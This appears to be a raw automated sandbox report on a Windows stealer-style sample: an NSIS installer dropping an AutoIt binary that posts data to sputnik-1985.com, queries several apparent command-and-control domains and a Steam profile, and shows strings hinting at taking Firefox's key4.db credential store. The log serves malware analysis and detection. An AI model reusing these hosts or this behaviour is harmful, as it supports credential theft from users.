Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K7ZWZ85O1CBNYMQQ8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=46BGISZ6K1JZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8755Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K7J331VRLLP83P6PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UUC0SH7V04Z9YMTETJPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1290Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N7PIYC5OW1AEA03O2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1135Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E3D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

10_2_00E3D889

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: aGpUaEJqSGxZhd.aGpUaEJqSGxZhd
Source: global traffic	DNS traffic detected: DNS query: ingreem-eilish.biz
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sputnik-1985.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com

Source: HouseholdsClicking.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: HouseholdsClicking.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: HouseholdsClicking.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: HouseholdsClicking.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: HouseholdsClicking.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: HouseholdsClicking.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: HouseholdsClicking.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: HouseholdsClicking.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: HouseholdsClicking.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: HouseholdsClicking.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp, HouseholdsClicking.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: HouseholdsClicking.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: HouseholdsClicking.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: HouseholdsClicking.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store.steamp
Source: Appliance.com, 0000000A.00000000.1780609584.0000000000E95000.00000002.00000001.01000000.00000007.sdmp, Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Replacing.0.dr, Appliance.com.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: HouseholdsClicking.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastl
Source: Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastlyVG7
Source: Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api
Source: HouseholdsClicking.exe	String found in binary or memory: https://notepad-plus-plus.org/0
Source: Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou:443/api
Source: Appliance.com, 0000000A.00000003.2060885698.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2114472331.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059066232.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115264331.00000000042FA000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059317264.000000000433C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/
Source: Appliance.com, 0000000A.00000002.2115264331.00000000042FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/%e
Source: Appliance.com, 0000000A.00000002.2115264331.0000000004335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/)g
Source: Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/Cj9F
Source: Appliance.com, 0000000A.00000003.2060885698.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059066232.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059317264.000000000433C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/Wn3
Source: Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/Y
Source: Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115045633.0000000001C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api
Source: Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api#bq
Source: Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api/
Source: Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/shqK
Source: Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com:443/api
Source: Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com:443/api2o4p.default-release/key4.dbPK
Source: Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.s
Source: Appliance.com, 0000000A.00000003.2036753349.0000000004437000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Appliance.com, 0000000A.00000003.2036831338.0000000001D14000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036753349.0000000004435000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Appliance.com, 0000000A.00000003.2036831338.0000000001CEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Appliance.com, 0000000A.00000003.2036831338.0000000001D14000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036753349.0000000004435000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Appliance.com, 0000000A.00000003.2036831338.0000000001CEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Appliance.com.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E3F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

10_2_00E3F7C7

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E3F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

10_2_00E3F55C

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E59FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

10_2_00E59FD2

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00DDFFE0 CloseHandle,NtProtectVirtualMemory,

10_2_00DDFFE0

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E34763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

10_2_00E34763

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E21B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

10_2_00E21B4D

Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E2F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		10_2_00E2F20D

Source: C:\Users\user\Desktop\HouseholdsClicking.exe	File created: C:\Windows\ArHuntington	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	File created: C:\Windows\ProductiveRacing	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	File created: C:\Windows\BbsStolen	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	File created: C:\Windows\ScoreAtom	Jump to behavior

Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE8017	10_2_00DE8017
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DCE1F0	10_2_00DCE1F0
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DDE144	10_2_00DDE144
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DC22AD	10_2_00DC22AD
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE22A2	10_2_00DE22A2
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DFA26E	10_2_00DFA26E
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DDC624	10_2_00DDC624
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E4C8A4	10_2_00E4C8A4
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DFE87F	10_2_00DFE87F
